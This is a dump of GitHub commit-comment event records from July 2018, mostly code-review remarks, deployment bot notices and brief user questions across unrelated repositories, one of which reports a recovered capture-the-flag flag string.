{"id":"7970853610","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29721104,"position":null,"line":null,"path":null,"commit_id":"686dc3e09537e74b1b2b713569304bfdb9d5b1bb","created_at":"2018-07-16T14:00:15Z","updated_at":"2018-07-16T14:00:15Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-70](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-70).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-70-next50.pantheonsite.io/)"}},"created_at":"2018-07-16T14:00:15Z"}
{"id":"7970854951","type":"CommitCommentEvent","actor":{"login":"ruling11ghs"},"repo":{"name":"ruling11ghs/DP-EXD-Latency-Graph"},"payload":{"comment":{"id":29721109,"position":1,"line":11,"path":"index.py","commit_id":"7b3e476b18b4de61d56a97b140c235df471e3b3b","created_at":"2018-07-16T14:00:26Z","updated_at":"2018-07-16T14:00:26Z","author_association":"OWNER","body":"This list should contain all of the different stages in the right place. You may have to edit it yourself as the stages may not all be the same."}},"created_at":"2018-07-16T14:00:26Z"}
{"id":"7970856102","type":"CommitCommentEvent","actor":{"login":"vavikast"},"repo":{"name":"vavikast/Django"},"payload":{"comment":{"id":29721111,"position":null,"line":null,"path":null,"commit_id":"50991b9adbe4fc205f883ab2a2e6346e8c65ceb3","created_at":"2018-07-16T14:00:36Z","updated_at":"2018-07-16T14:00:36Z","author_association":"OWNER","body":"s"}},"created_at":"2018-07-16T14:00:36Z"}
{"id":"7970863573","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29721130,"position":null,"line":null,"path":null,"commit_id":"48540b0c52f0930c7b257c384731d1e328a42a87","created_at":"2018-07-16T14:01:43Z","updated_at":"2018-07-16T14:01:43Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#sep-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#sep-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://sep-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-16T14:01:43Z"}
{"id":"7970865388","type":"CommitCommentEvent","actor":{"login":"joshmh"},"repo":{"name":"lamassu/lamassu-server"},"payload":{"comment":{"id":29721135,"position":null,"line":null,"path":null,"commit_id":"8b7921d95d67bd6b021da267689834720053c713","created_at":"2018-07-16T14:02:00Z","updated_at":"2018-07-16T14:02:00Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [json-rpc error upon Zcash Funding panel](https://trello.com/c/JgANmN9v/571-json-rpc-error-upon-zcash-funding-panel)"}},"created_at":"2018-07-16T14:02:00Z"}
{"id":"7970867288","type":"CommitCommentEvent","actor":{"login":"danlipsa"},"repo":{"name":"OpenDataAnalytics/kitware-geospatial-recipes"},"payload":{"comment":{"id":29721137,"position":5,"line":16,"path":"recipes/texture-atlas/meta.yaml","commit_id":"af3d7d36f8f4b2d1c7371b01b90631134b38b208","created_at":"2018-07-16T14:02:18Z","updated_at":"2018-07-16T14:02:18Z","author_association":"NONE","body":"Yes, if we packages that are not quite ready to be added on conda-forge - or we don't want to commit the effort to maintain a package on conda-forge.\r\n\r\nConda processes channels in order - this means we had to list kitware-geospatial before conda-forge."}},"created_at":"2018-07-16T14:02:18Z"}
{"id":"7970870406","type":"CommitCommentEvent","actor":{"login":"BlueLightning42"},"repo":{"name":"BlueLightning42/BTECH-Language"},"payload":{"comment":{"id":29721148,"position":null,"line":null,"path":null,"commit_id":"d78cbb172ec6efd10a50483a65a829b31f0c232d","created_at":"2018-07-16T14:02:48Z","updated_at":"2018-07-16T14:02:48Z","author_association":"OWNER","body":"\"small changes\""}},"created_at":"2018-07-16T14:02:48Z"}
{"id":"7970871090","type":"CommitCommentEvent","actor":{"login":"MageSlayer"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29721149,"position":5,"line":323,"path":"CMakeLists.txt","commit_id":"0902becf070f15dfb98af8729182da989754704d","created_at":"2018-07-16T14:02:54Z","updated_at":"2018-07-16T14:02:54Z","author_association":"OWNER","body":"1.65.0 \r\nIt's latest stable in Gentoo, afaiu."}},"created_at":"2018-07-16T14:02:54Z"}
{"id":"7970872162","type":"CommitCommentEvent","actor":{"login":"sodapaps"},"repo":{"name":"sodapaps/TheLairofRlimShaikorth"},"payload":{"comment":{"id":29721150,"position":null,"line":null,"path":null,"commit_id":"664df160b36df8556cd03dfd6bb2d30d6eee29b2","created_at":"2018-07-16T14:03:05Z","updated_at":"2018-07-16T14:03:05Z","author_association":"OWNER","body":"Took out the first token that opened up the test basement. Polished up a few other things."}},"created_at":"2018-07-16T14:03:05Z"}
{"id":"7970875603","type":"CommitCommentEvent","actor":{"login":"EXPEaneparaczki"},"repo":{"name":"everit-org/json-schema"},"payload":{"comment":{"id":29721155,"position":null,"line":null,"path":null,"commit_id":"2da08e50bef1e75cb496299b7c151f725d363fe3","created_at":"2018-07-16T14:03:38Z","updated_at":"2018-07-16T14:03:38Z","author_association":"NONE","body":"awesome! thank you very much!"}},"created_at":"2018-07-16T14:03:38Z"}
{"id":"7970877391","type":"CommitCommentEvent","actor":{"login":"MageSlayer"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29721158,"position":null,"line":null,"path":null,"commit_id":"0902becf070f15dfb98af8729182da989754704d","created_at":"2018-07-16T14:03:55Z","updated_at":"2018-07-16T14:03:55Z","author_association":"OWNER","body":"I am not related to upstream unfortunately."}},"created_at":"2018-07-16T14:03:55Z"}
{"id":"7970880662","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IS5inR"},"payload":{"comment":{"id":29721162,"position":null,"line":null,"path":null,"commit_id":"ffcf05b14d4bc8eaec0cadf1f6b48db45a1b2186","created_at":"2018-07-16T14:04:26Z","updated_at":"2018-07-16T14:04:26Z","author_association":"CONTRIBUTOR","body":"Looks good, thanks!"}},"created_at":"2018-07-16T14:04:26Z"}
{"id":"7970889450","type":"CommitCommentEvent","actor":{"login":"miniCloudMES"},"repo":{"name":"miniCloudMES/miniCloudMES.github.io"},"payload":{"comment":{"id":29721180,"position":1,"line":1,"path":"README.md","commit_id":"1b9497c028004595ee3da4beebf2421a1838df93","created_at":"2018-07-16T14:05:52Z","updated_at":"2018-07-16T14:05:52Z","author_association":"OWNER","body":"Go back original image address."}},"created_at":"2018-07-16T14:05:52Z"}
{"id":"7970890535","type":"CommitCommentEvent","actor":{"login":"sneakernets"},"repo":{"name":"sneakernets/DMXOPL"},"payload":{"comment":{"id":29721182,"position":null,"line":null,"path":null,"commit_id":"f54a1e94fdbc8da7ccf78f8dc05d4fd6eea7bb3f","created_at":"2018-07-16T14:06:02Z","updated_at":"2018-07-16T14:06:02Z","author_association":"OWNER","body":"Thanks! I've been going through and adding some from my XG rack as I find them, A friend of mine also has an XG Rack that she's been helping me out with.\r\n\r\nYeah I'll take a look at your bank, I've been trying to get stuff \"solid\" for a doom mod I'm involved with, because the bank will be \"baked in\" to the EXE."}},"created_at":"2018-07-16T14:06:02Z"}
{"id":"7970890814","type":"CommitCommentEvent","actor":{"login":"dellis1972"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":29721183,"position":6,"line":310,"path":"src/Xamarin.Android.Build.Tasks/Tasks/GenerateJavaStubs.cs","commit_id":"3d999d32c3dcd78f687f0976f0b5a6a985736a75","created_at":"2018-07-16T14:06:05Z","updated_at":"2018-07-16T14:06:05Z","author_association":"CONTRIBUTOR","body":"@jonathanpeppers this broke instant run.. because now if you update a resource the map files is touched even if it did't change."}},"created_at":"2018-07-16T14:06:05Z"}
{"id":"7970892906","type":"CommitCommentEvent","actor":{"login":"dellis1972"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":29721188,"position":6,"line":310,"path":"src/Xamarin.Android.Build.Tasks/Tasks/GenerateJavaStubs.cs","commit_id":"3d999d32c3dcd78f687f0976f0b5a6a985736a75","created_at":"2018-07-16T14:06:25Z","updated_at":"2018-07-16T14:06:25Z","author_association":"CONTRIBUTOR","body":"we should probably put this in an `if` ?\r\n"}},"created_at":"2018-07-16T14:06:25Z"}
{"id":"7970893730","type":"CommitCommentEvent","actor":{"login":"dellis1972"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":29721190,"position":6,"line":310,"path":"src/Xamarin.Android.Build.Tasks/Tasks/GenerateJavaStubs.cs","commit_id":"3d999d32c3dcd78f687f0976f0b5a6a985736a75","created_at":"2018-07-16T14:06:33Z","updated_at":"2018-07-16T14:06:33Z","author_association":"CONTRIBUTOR","body":"I will check locally"}},"created_at":"2018-07-16T14:06:33Z"}
{"id":"7970894836","type":"CommitCommentEvent","actor":{"login":"peppsac"},"repo":{"name":"iTowns/itowns"},"payload":{"comment":{"id":29721197,"position":5,"line":61,"path":"test/examples/bootstrap.js","commit_id":"fe1247195a51b8645b23fc86b47c6730cebbabd0","created_at":"2018-07-16T14:06:43Z","updated_at":"2018-07-16T14:06:43Z","author_association":"CONTRIBUTOR","body":"Yep, that's an intended change."}},"created_at":"2018-07-16T14:06:43Z"}
{"id":"7970895931","type":"CommitCommentEvent","actor":{"login":"Darcman99"},"repo":{"name":"Darcman99/Sarcina"},"payload":{"comment":{"id":29721199,"position":null,"line":null,"path":null,"commit_id":"34bfffd919151737eabcdf68535cef61d47d0450","created_at":"2018-07-16T14:06:54Z","updated_at":"2018-07-16T14:06:54Z","author_association":"OWNER","body":"Ofuck."}},"created_at":"2018-07-16T14:06:54Z"}
{"id":"7970897521","type":"CommitCommentEvent","actor":{"login":"Error1000"},"repo":{"name":"LiveOverflow/ctf"},"payload":{"comment":{"id":29721203,"position":null,"line":null,"path":null,"commit_id":"a5c9d078dfd2d4d3eecf79120d6ec99fd97926c9","created_at":"2018-07-16T14:07:09Z","updated_at":"2018-07-16T14:07:09Z","author_association":"NONE","body":"Found it, just had to search for a clone that maybe somebody made, apparently the web archive project took a snapshot just at the right time.\r\nhttps://web.archive.org/web/20150428231248/https://github.com/LiveOverflow/ctf/blob/master/flag\r\n\r\nIf the site is now down for anyone wondering the file named \"flag\" contained:\r\n`LO{the_1nt3rnet_n3v3r_f0rgets}`\r\n\r\nThe flag is: `the_1nt3rnet_n3v3r_f0rgets`"}},"created_at":"2018-07-16T14:07:09Z"}
{"id":"7970897620","type":"CommitCommentEvent","actor":{"login":"soudis"},"repo":{"name":"soudis/datencockpit-docker"},"payload":{"comment":{"id":29721204,"position":null,"line":null,"path":null,"commit_id":"6622942c55899ce3c37eaa39c2130552909624c1","created_at":"2018-07-16T14:07:10Z","updated_at":"2018-07-16T14:07:10Z","author_association":"OWNER","body":"#4 "}},"created_at":"2018-07-16T14:07:10Z"}
{"id":"7970903296","type":"CommitCommentEvent","actor":{"login":"Rafi1900"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29721211,"position":13,"line":12,"path":"README.md","commit_id":"b0799d2074e61a3bf40126ebc03834a744d65823","created_at":"2018-07-16T14:08:01Z","updated_at":"2018-07-16T14:08:01Z","author_association":"OWNER","body":"מפתיע אבל הוא נכון"}},"created_at":"2018-07-16T14:08:01Z"}
{"id":"7970903560","type":"CommitCommentEvent","actor":{"login":"ODugas"},"repo":{"name":"savoirfairelinux/cukinia"},"payload":{"comment":{"id":29721214,"position":5,"line":379,"path":"cukinia","commit_id":"91fd724e1e5e2a71020a509ae0552f59eae23a6c","created_at":"2018-07-16T14:08:03Z","updated_at":"2018-07-16T14:08:03Z","author_association":"NONE","body":"good idea. but don't forget to wrap pname in quotes. If it becomes undefined at some point, your script will crash down in flames."}},"created_at":"2018-07-16T14:08:03Z"}
{"id":"7970905144","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29721220,"position":null,"line":null,"path":null,"commit_id":"c9f1045e00c934539b8ea463f59f92865a06ca4b","created_at":"2018-07-16T14:08:17Z","updated_at":"2018-07-16T14:08:17Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-72](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-72).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-72-next50.pantheonsite.io/)"}},"created_at":"2018-07-16T14:08:17Z"}
{"id":"7970914624","type":"CommitCommentEvent","actor":{"login":"xinleifeng"},"repo":{"name":"xinleifeng/RepoXF"},"payload":{"comment":{"id":29721237,"position":null,"line":null,"path":null,"commit_id":"e27af4f00785a416fcc2ea88c81ece4522d508fb","created_at":"2018-07-16T14:09:44Z","updated_at":"2018-07-16T14:09:44Z","author_association":"OWNER","body":"abc"}},"created_at":"2018-07-16T14:09:44Z"}
{"id":"7970919297","type":"CommitCommentEvent","actor":{"login":"Vigneshlakshminarayanan"},"repo":{"name":"KittyCookie/react-native-chartjs"},"payload":{"comment":{"id":29721245,"position":null,"line":null,"path":null,"commit_id":"2b3e646c355120567aead0d0f72c71cfd1a26567","created_at":"2018-07-16T14:10:29Z","updated_at":"2018-07-16T14:10:29Z","author_association":"NONE","body":"@KittyCookie I'm currently developing a mobile app in react native and use this library to render an horizontal bar chart. It works fine when development/debug. When I generate APK and install in my tablet, the chart is not rendering. it shows an empty page. Any ideas?"}},"created_at":"2018-07-16T14:10:29Z"}
{"id":"7970919331","type":"CommitCommentEvent","actor":{"login":"donaldsharp"},"repo":{"name":"opensourcerouting/frr"},"payload":{"comment":{"id":29721246,"position":13,"line":13,"path":"isisd/fabricd.conf.sample","commit_id":"7157cce2785bca34540d316c5b47101787e7fef1","created_at":"2018-07-16T14:10:29Z","updated_at":"2018-07-16T14:10:29Z","author_association":"NONE","body":"So this is a `new` protocol, do we need to abide by IS-IS rfc's?  Why can't we go our own direction?"}},"created_at":"2018-07-16T14:10:29Z"}
{"id":"7970925801","type":"CommitCommentEvent","actor":{"login":"SeanFeldman"},"repo":{"name":"paolosalvatori/ServiceBusExplorer"},"payload":{"comment":{"id":29721255,"position":41,"line":41,"path":"src/ServiceBusExplorer/Helpers/LanguageDetector.cs","commit_id":"845b4e54b37265973d1137754a56fa84e9801f30","created_at":"2018-07-16T14:11:32Z","updated_at":"2018-07-16T14:11:32Z","author_association":"COLLABORATOR","body":"C#'s `nameof()` is more suitable"}},"created_at":"2018-07-16T14:11:32Z"}
{"id":"7970929066","type":"CommitCommentEvent","actor":{"login":"SeanFeldman"},"repo":{"name":"paolosalvatori/ServiceBusExplorer"},"payload":{"comment":{"id":29721259,"position":46,"line":46,"path":"src/ServiceBusExplorer/Helpers/LanguageDetector.cs","commit_id":"845b4e54b37265973d1137754a56fa84e9801f30","created_at":"2018-07-16T14:12:02Z","updated_at":"2018-07-16T14:12:02Z","author_association":"COLLABORATOR","body":"C#'s `nameof()` is more suitable"}},"created_at":"2018-07-16T14:12:02Z"}
{"id":"7970930343","type":"CommitCommentEvent","actor":{"login":"nscozzaro"},"repo":{"name":"nscozzaro/physics-is-beautiful"},"payload":{"comment":{"id":29721261,"position":null,"line":null,"path":null,"commit_id":"977688aac80afed4a36d3fe5abfa86f8dc6affc4","created_at":"2018-07-16T14:12:14Z","updated_at":"2018-07-16T14:12:14Z","author_association":"OWNER","body":"Given that Hiran and Michael haven't been active on the project for quite a while now, I'll go ahead and make some more updates to this page before pushing to the site. "}},"created_at":"2018-07-16T14:12:14Z"}
{"id":"7970931999","type":"CommitCommentEvent","actor":{"login":"SeanFeldman"},"repo":{"name":"paolosalvatori/ServiceBusExplorer"},"payload":{"comment":{"id":29721266,"position":71,"line":71,"path":"src/ServiceBusExplorer/Helpers/LanguageDetector.cs","commit_id":"845b4e54b37265973d1137754a56fa84e9801f30","created_at":"2018-07-16T14:12:30Z","updated_at":"2018-07-16T14:12:30Z","author_association":"COLLABORATOR","body":"C#'s `nameof()` is more suitable"}},"created_at":"2018-07-16T14:12:30Z"}
{"id":"7970934058","type":"CommitCommentEvent","actor":{"login":"SeanFeldman"},"repo":{"name":"paolosalvatori/ServiceBusExplorer"},"payload":{"comment":{"id":29721267,"position":76,"line":76,"path":"src/ServiceBusExplorer/Helpers/LanguageDetector.cs","commit_id":"845b4e54b37265973d1137754a56fa84e9801f30","created_at":"2018-07-16T14:12:49Z","updated_at":"2018-07-16T14:12:49Z","author_association":"COLLABORATOR","body":"C#'s `nameof()` is more suitable"}},"created_at":"2018-07-16T14:12:49Z"}
{"id":"7970935658","type":"CommitCommentEvent","actor":{"login":"devoncarew"},"repo":{"name":"flutter/flutter"},"payload":{"comment":{"id":29721272,"position":null,"line":null,"path":null,"commit_id":"e198d00ffdf0a98769bb09c737c6b4746a319571","created_at":"2018-07-16T14:13:06Z","updated_at":"2018-07-16T14:13:06Z","author_association":"MEMBER","body":"lgtm"}},"created_at":"2018-07-16T14:13:06Z"}
{"id":"7970936085","type":"CommitCommentEvent","actor":{"login":"guyknowsguy"},"repo":{"name":"JonathanCooper/motion-detect"},"payload":{"comment":{"id":29721274,"position":null,"line":null,"path":null,"commit_id":"d157db7a8e303a09e932f7a12ce70ccdb12142c8","created_at":"2018-07-16T14:13:10Z","updated_at":"2018-07-16T14:13:10Z","author_association":"NONE","body":"I am sorry to bother you like this but I am just starting on programming and wanted to try your programe but i cant seem to run it.\r\n![wr](https://user-images.githubusercontent.com/39406435/42763354-a02ab2de-88c7-11e8-9af4-a0a71c80dfe0.PNG)\r\nI would be glad to receive a response.\r\n"}},"created_at":"2018-07-16T14:13:10Z"}
{"id":"7970938604","type":"CommitCommentEvent","actor":{"login":"jonathanpeppers"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":29721282,"position":6,"line":310,"path":"src/Xamarin.Android.Build.Tasks/Tasks/GenerateJavaStubs.cs","commit_id":"3d999d32c3dcd78f687f0976f0b5a6a985736a75","created_at":"2018-07-16T14:13:33Z","updated_at":"2018-07-16T14:13:33Z","author_association":"CONTRIBUTOR","body":"Ok, we can do this if those `typemap` files aren't an `Output`.\r\n\r\nMaybe there should be a stamp file for the `_GenerateJavaStubs` target?"}},"created_at":"2018-07-16T14:13:33Z"}
{"id":"7970939515","type":"CommitCommentEvent","actor":{"login":"Saiyato"},"repo":{"name":"Saiyato/volumio-snapcast-plugin"},"payload":{"comment":{"id":29721285,"position":null,"line":null,"path":null,"commit_id":"167a349e07658c03e1ef2125d1c1e9380306e000","created_at":"2018-07-16T14:13:42Z","updated_at":"2018-07-16T14:13:42Z","author_association":"OWNER","body":"Fixes #42 "}},"created_at":"2018-07-16T14:13:42Z"}
{"id":"7970941017","type":"CommitCommentEvent","actor":{"login":"SeanFeldman"},"repo":{"name":"paolosalvatori/ServiceBusExplorer"},"payload":{"comment":{"id":29721288,"position":101,"line":101,"path":"src/ServiceBusExplorer/Helpers/LanguageDetector.cs","commit_id":"845b4e54b37265973d1137754a56fa84e9801f30","created_at":"2018-07-16T14:13:57Z","updated_at":"2018-07-16T14:13:57Z","author_association":"COLLABORATOR","body":"C#'s `nameof()` is more suitable for both checks"}},"created_at":"2018-07-16T14:13:57Z"}
{"id":"7970945559","type":"CommitCommentEvent","actor":{"login":"thelastinuit"},"repo":{"name":"miguejs/wailord"},"payload":{"comment":{"id":29721294,"position":2,"line":2,"path":"package.json","commit_id":"2a41f985b6f49757e0a33a6632117378b7a75a9d","created_at":"2018-07-16T14:14:40Z","updated_at":"2018-07-16T14:14:40Z","author_association":"NONE","body":"😂 the name rocks my socks!"}},"created_at":"2018-07-16T14:14:40Z"}
{"id":"7970948711","type":"CommitCommentEvent","actor":{"login":"deangray82"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29721305,"position":88,"line":88,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T14:15:12Z","updated_at":"2018-07-16T14:15:12Z","author_association":"NONE","body":"A description like this should be added above the function. http://docs.phpdoc.org/getting-started/your-first-set-of-documentation.html#example"}},"created_at":"2018-07-16T14:15:12Z"}
{"id":"7970948784","type":"CommitCommentEvent","actor":{"login":"baynes"},"repo":{"name":"Perl-Toolchain-Gang/Module-Build"},"payload":{"comment":{"id":29721306,"position":null,"line":null,"path":null,"commit_id":"fbe955b2094cb01b98e4769a677bffbbaf5452cb","created_at":"2018-07-16T14:15:12Z","updated_at":"2018-07-16T14:15:12Z","author_association":"NONE","body":"This commit has the effect that the environment variable \"HARNESS_PERL_SWITCHES\" is no longer set to \"-MDevel::Cover\"\r\n\r\nBut Devel::Cover looks fot that being set and goes into silent mode if it is set.\r\n\r\nIf a unit test involves forking a child and the parent reading the standard output from the child, then Devel::Cover not being in silent mode means it spams the ouput from the child, the parent objects and the test fails.\r\n\r\nIt has taken two days of investigation into why a working unit test stopped working on upgrading."}},"created_at":"2018-07-16T14:15:12Z"}
{"id":"7970953443","type":"CommitCommentEvent","actor":{"login":"seonyu10"},"repo":{"name":"seonyu10/SHgallery"},"payload":{"comment":{"id":29721320,"position":null,"line":null,"path":null,"commit_id":"0d1485d11464067193f577db80e85ed4a6093ab0","created_at":"2018-07-16T14:15:55Z","updated_at":"2018-07-16T14:15:55Z","author_association":"OWNER","body":"우와"}},"created_at":"2018-07-16T14:15:55Z"}
{"id":"7970957903","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29721330,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-16T14:16:39Z","updated_at":"2018-07-16T14:16:39Z","author_association":"OWNER","body":"There seem do be indeed changes to ditroff files, albeit minor differences regarding the scaling in `doc/just/doc.ditroff` (old output file: [doc.ditroff.gz](https://github.com/n-t-roff/heirloom-doctools/files/2197950/doc.ditroff.gz)) and `doc/troff/doc.ditroff` (old output file: [doc.ditroff.gz](https://github.com/n-t-roff/heirloom-doctools/files/2197953/doc.ditroff.gz)).\r\n"}},"created_at":"2018-07-16T14:16:39Z"}
{"id":"7970959201","type":"CommitCommentEvent","actor":{"login":"sneakernets"},"repo":{"name":"sneakernets/DMXOPL"},"payload":{"comment":{"id":29721331,"position":null,"line":null,"path":null,"commit_id":"f54a1e94fdbc8da7ccf78f8dc05d4fd6eea7bb3f","created_at":"2018-07-16T14:16:51Z","updated_at":"2018-07-16T14:16:51Z","author_association":"OWNER","body":"OH wow this is an amazing piece of work! I would love to incorporate this! how new is this? as of my latest changes? If so I can just tweak the ones I'm eh on and have a much better drum set for GS. Issue is that I'm seeing XG midis that use XG percussion, which isn't the same as GS... Big problem there :V "}},"created_at":"2018-07-16T14:16:51Z"}
{"id":"7970968658","type":"CommitCommentEvent","actor":{"login":"Junwon6"},"repo":{"name":"Junwon6/BottomUp-project"},"payload":{"comment":{"id":29721363,"position":null,"line":null,"path":null,"commit_id":"7132b70532036907af02cc30b7df87f6fdc1d30b","created_at":"2018-07-16T14:18:22Z","updated_at":"2018-07-16T14:18:22Z","author_association":"OWNER","body":"- 한번만 쓰인 부분인데 class로 되어있는 것은 id로 변경\r\n- class와 tag 이름을 중복해서 css 선택자로 사용한 부분은 하나로 통일\r\n- 메뉴부분을 header 태그를 추가해서 안에 넣음\r\n- 코드 정렬 (내어쓰기, 줄맞춤 등)"}},"created_at":"2018-07-16T14:18:22Z"}
{"id":"7970973714","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"Callek/redo"},"payload":{"comment":{"id":29721367,"position":null,"line":null,"path":null,"commit_id":"efacefedf4979ea6113c5abb31a66208ea2a6d57","created_at":"2018-07-16T14:19:11Z","updated_at":"2018-07-16T14:19:11Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.json#\nErrors:\n  * data.tasks should be array\n\n</details>"}},"created_at":"2018-07-16T14:19:11Z"}
{"id":"7970975049","type":"CommitCommentEvent","actor":{"login":"dellis1972"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":29721370,"position":6,"line":310,"path":"src/Xamarin.Android.Build.Tasks/Tasks/GenerateJavaStubs.cs","commit_id":"3d999d32c3dcd78f687f0976f0b5a6a985736a75","created_at":"2018-07-16T14:19:24Z","updated_at":"2018-07-16T14:19:24Z","author_association":"CONTRIBUTOR","body":"when I say instant run I mean the new stuff which deploys the resources."}},"created_at":"2018-07-16T14:19:24Z"}
{"id":"7970978421","type":"CommitCommentEvent","actor":{"login":"csthomas"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29721372,"position":95,"line":168,"path":"libraries/src/Session/MetadataManager.php","commit_id":"6bc07106cdb153b91f7d56ebf71d40f04c9fb25c","created_at":"2018-07-16T14:19:55Z","updated_at":"2018-07-16T14:19:55Z","author_association":"CONTRIBUTOR","body":"PR https://github.com/joomla/joomla-cms/pull/19708 needs only 2 testers:)"}},"created_at":"2018-07-16T14:19:55Z"}
{"id":"7970992549","type":"CommitCommentEvent","actor":{"login":"kanishka-azimi"},"repo":{"name":"phadej/hspec-expectations"},"payload":{"comment":{"id":29721397,"position":null,"line":null,"path":null,"commit_id":"51aa36e41b717ef3916983e30706c24d72b2954c","created_at":"2018-07-16T14:22:09Z","updated_at":"2018-07-16T14:22:09Z","author_association":"NONE","body":"I would use these if you upstream them."}},"created_at":"2018-07-16T14:22:09Z"}
{"id":"7970997063","type":"CommitCommentEvent","actor":{"login":"anidh"},"repo":{"name":"anidh/recipes"},"payload":{"comment":{"id":29721403,"position":5,"line":10,"path":"cake-recipe.txt","commit_id":"b6f1cbae8e99ba977000c6c454cf845df250190b","created_at":"2018-07-16T14:22:50Z","updated_at":"2018-07-16T14:22:50Z","author_association":"OWNER","body":"It's again recheck"}},"created_at":"2018-07-16T14:22:50Z"}
{"id":"7970998148","type":"CommitCommentEvent","actor":{"login":"nathanchance"},"repo":{"name":"android-linux-stable/msm-3.18"},"payload":{"comment":{"id":29721404,"position":null,"line":null,"path":null,"commit_id":"9fbe13978f9f0f093ce4d986593e75b9abea86bd","created_at":"2018-07-16T14:23:01Z","updated_at":"2018-07-16T14:23:01Z","author_association":"MEMBER","body":"Qualcomm must have discarded these changes during a kernel/common merge. Any time you see a commit in `git log` whose change isn't present in the tree without a revert, that's usually the only logical explanation."}},"created_at":"2018-07-16T14:23:01Z"}
{"id":"7970999219","type":"CommitCommentEvent","actor":{"login":"cjpdee"},"repo":{"name":"cjpdee/Multiplayer"},"payload":{"comment":{"id":29721405,"position":182,"line":213,"path":"game.js","commit_id":"18c8857a686f86f1ce37341751c10acdae449c55","created_at":"2018-07-16T14:23:12Z","updated_at":"2018-07-16T14:23:12Z","author_association":"OWNER","body":"This section was missing and broke the game"}},"created_at":"2018-07-16T14:23:12Z"}
{"id":"7971001805","type":"CommitCommentEvent","actor":{"login":"hectorcorrea"},"repo":{"name":"Brown-University-Library/bul-search"},"payload":{"comment":{"id":29721413,"position":73,"line":351,"path":"app/assets/javascripts/catalog_record_availability.js","commit_id":"2b3b030cded6c84a1a8281ade3da0578723f9e66","created_at":"2018-07-16T14:23:36Z","updated_at":"2018-07-16T14:23:36Z","author_association":"MEMBER","body":"check for status in addition to the location"}},"created_at":"2018-07-16T14:23:36Z"}
{"id":"7971002710","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29721417,"position":null,"line":null,"path":null,"commit_id":"1687f4d7e1b635fe7b0c0078904748ab064dcd92","created_at":"2018-07-16T14:23:45Z","updated_at":"2018-07-16T14:23:45Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#sep-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#sep-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://sep-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-16T14:23:45Z"}
{"id":"7971004273","type":"CommitCommentEvent","actor":{"login":"jduss4"},"repo":{"name":"CDRH/orchid"},"payload":{"comment":{"id":29721419,"position":5,"line":50,"path":"app/views/items/_facets.html.erb","commit_id":"ac13ae07a1bd0f216fbc757a61e7756c78ae33ac","created_at":"2018-07-16T14:23:59Z","updated_at":"2018-07-16T14:23:59Z","author_association":"MEMBER","body":"Yeah, I quickly learned that once you put \"locale\" in as a parameter, then if the paths were assuming that there was only one parameter, therefore no need to specify which one, it quickly threw errors that made it sound like it was looking for `locales/sub_category.yml` or whatever.  Being more specific about the path parameters seemed to make everything happy again, I just hope that I have found all of them.  Though I'll surely be clicking through all the pages as I keep switching out the text!  :)"}},"created_at":"2018-07-16T14:23:59Z"}
{"id":"7971006313","type":"CommitCommentEvent","actor":{"login":"deangray82"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29721426,"position":56,"line":56,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T14:24:19Z","updated_at":"2018-07-16T14:24:19Z","author_association":"NONE","body":"I don't think you need to pass by reference. `$uniqueValue` has not been updated."}},"created_at":"2018-07-16T14:24:19Z"}
